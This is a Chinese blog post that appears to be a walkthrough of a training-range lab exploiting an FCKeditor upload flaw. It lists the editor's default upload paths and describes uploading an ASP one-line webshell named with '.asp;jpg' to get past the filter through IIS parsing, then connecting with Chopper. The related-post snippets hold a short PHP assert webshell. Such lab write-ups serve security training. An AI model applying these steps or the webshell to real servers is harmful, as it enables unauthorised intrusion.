编辑器漏洞分析溯源(第1题)

最新推荐文章于 2022-11-05 17:05:25 发布
最新推荐文章于 2022-11-05 17:05:25 发布
阅读量303 收藏 1
点赞数
分类专栏: 编辑器漏洞 文章标签: 编辑器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127186314
版权

漏洞复现

在这里插入图片描述

1.首先查看fckeditor版本,在url中输入/fckeditor/_whatsnew.html

在这里插入图片描述

2.需要知道fckeditor的上传地址
常用的上传地址有:
(1)fckeditor/editor/filemanager/browser/default/connectors/test.html
(2)fckeditor/editor/filemanager/upload/test.html
(3)fckeditor/editor/filemanager/connectors/test.html
(4)fckeditor/editor/filemanager/connectors/uploadtest.html
每一个都试一下,发现是
fckeditor/editor/filemanager/connectors/test.html

在这里插入图片描述
上传一句话木马(asp类型),,但是这个版本的fckeditor是不允许上传asp后缀的文件,所以需要使用Burpsuite截包,修改后缀名为.asp;jpg

在这里插入图片描述

在这里插入图片描述
后面就菜刀连接

Yolo山药
关注
专栏目录
墨者靶场 初级:编辑器漏洞分析溯源(第1
qq_43233085的博客
01-19 708
墨者靶场 初级:编辑器漏洞分析溯源(第1目背景介绍实训目标解方向解步骤 目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解方向 根据目提示,进行网站测试。 解步骤 启动靶机,访问链接。 根据提示,使用fck漏洞利用工具,找到文件上传页面。 ...
墨者学院-编辑器漏洞分析溯源(第2)
JimWu的博客
09-05 399
编辑器漏洞分析溯源(第2) 难易程度:★★ 目类型:编辑器漏洞 使用工具:IE、菜刀、win2003 1.打开靶场 首先要了解ewebeditor的基本特征: 默认登陆admin_login.asp 默认数据库db/ewebeditor.mdb 2.在url中输入数据库,下载文件,就能得到登录的用户名和密码。 但是用户名经过了md5加密,需要通过网上来解密,得到用户名和密码。 3.登录...
墨者学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 750
<?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
墨者学院 - WebShell文件上传漏洞分析溯源(第1)
多崎巡礼的博客
07-26 1553
上传图片成功 上传php失败,即存在过滤 尝试更改php版本 上传成功 得到key
墨者学院-编辑器漏洞分析溯源(第3)
JimWu的博客
09-05 527
编辑器漏洞分析溯源(第3) 难易程度:★★★ 目类型:编辑器漏洞 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,首先了解DotNetTextBox编辑器的基本特征。 默认的上传路径为:/system_dntb/uploadimg.aspx 2.打开后,发现是不允许上传的。 试图在F12情况下,将disabled修改enabled,虽然能上传,但会报错。 3.利用Do...
墨者_编辑器漏洞分析溯源(第3)
weixin_50698958的博客
10-23 307
靶场: https://www.mozhe.cn/bug/detail/M2V0K0k2dHViVk1yR2o4Mnk4SHF6Zz09bW96aGUmozhe 背景介绍 DotNetTextBox编辑器漏洞利用 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解方向 根据页面提示,进行漏洞利用 解思路: 百度DotNetTextBox编辑器漏洞利用 参考 1、打开网页找到默认..
墨者学院-编辑器漏洞分析溯源(第1)
JimWu的博客
09-05 865
编辑器漏洞分析溯源(第1) 难易程度:★★ 目类型:编辑器漏洞 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,看到提示信息显示fckeditor。 2.首先查看fckeditor版本,在url中输入/fckeditor/_whatsnew.html 3.然后需要知道fckeditor的上传地址 常用的上传地址有: (1)fckeditor/editor/filema...
墨者学院 - IIS写权限漏洞分析溯源
多崎巡礼的博客
08-29 1418
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。     iis scan工具链接 链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54 ...
墨者学院 - WebShell文件上传分析溯源(第1)
多崎巡礼的博客
08-29 1034
同 墨者学院 - WebShell文件上传漏洞分析溯源(第5) 一模一样啊,,, https://blog.csdn.net/qq_42357070/article/details/81665014 。。。
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
Fckeditor漏洞利用方法总结
oceanark的博客
07-13 5943
1.查看编辑器版本 FCKeditor/_whatsnew.html —————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————————— 3.Version action=”ht
FCKEditor配置及功能实现详解
weixin_45525177的博客
09-21 431
FCKEditor的word图片转存
FCKeditor - Fckeditor使用说明含文件上传功能
Re:从零开始的程序员生涯
04-12 543
大家知道FCKeditor是一款强大的富文本框控件,可能很多人还不知道如何把她加入到项目中,或者知道但是已经忘记了,没关系,我们在这学习学习,复习复习。 [color=red][b]1、下载fckeditor[/b][/color] 地址:http://ckeditor.com/ [color=red][b]2、导入jar包和文件[/b][/color] fckeditor-jav...
fckeditor上传文件配置
笨笨的专栏
07-06 1450
配置fckeditor上传(php为例)
任意(不安全)文件下载和上传
weixin_46102386的博客
08-03 741
文章目录 一、任意文件下载 1)漏洞介绍 2)利用方式 3)漏洞修复 二、 任意文件上传 1)概述 2)测试流程 3)实战测试 3.1 客户端检测绕过(javascript 检测) 3.2服务端验证绕过 (MIME 类型检测) 4)代码注入绕过–getimagesize() 5)路径/扩展名绕过 5.1 白名单 5.2 黑名单 6)中间件解析漏洞绕过 7)安全防范 ...
Xray捡洞中的高频漏洞
热门推荐
m0_49936858的博客
08-12 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危。
记一次内网靶机实战
最新发布
千寻的博客
11-05 1986
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
编辑器漏洞(配合文件上传等)
guanjian_ci的博客
03-23 5888
编辑器分类:ewebeditor、kindeditor、ckeditor、fckeditor、Cute Editor、ueditor、southidceditor等等 一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等) (1)漏洞1 Admin_Login.asp 登录页面 Admin_Default.asp 管理首页 Admin_Style.asp 样式页面 Admin_UploadFile.asp 上...
"大数据安全分析溯源关键技术标准规范及评分统一标准
大数据安全分析溯源关键技术是保障数据安全的重要手段之一。在此,我们将介绍基于大数据的安全分析溯源关键技术的重要性、技术标准规范及评分统一标准,并简要梳理移动互联网系统和应用安全国家工程试验室基于大...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值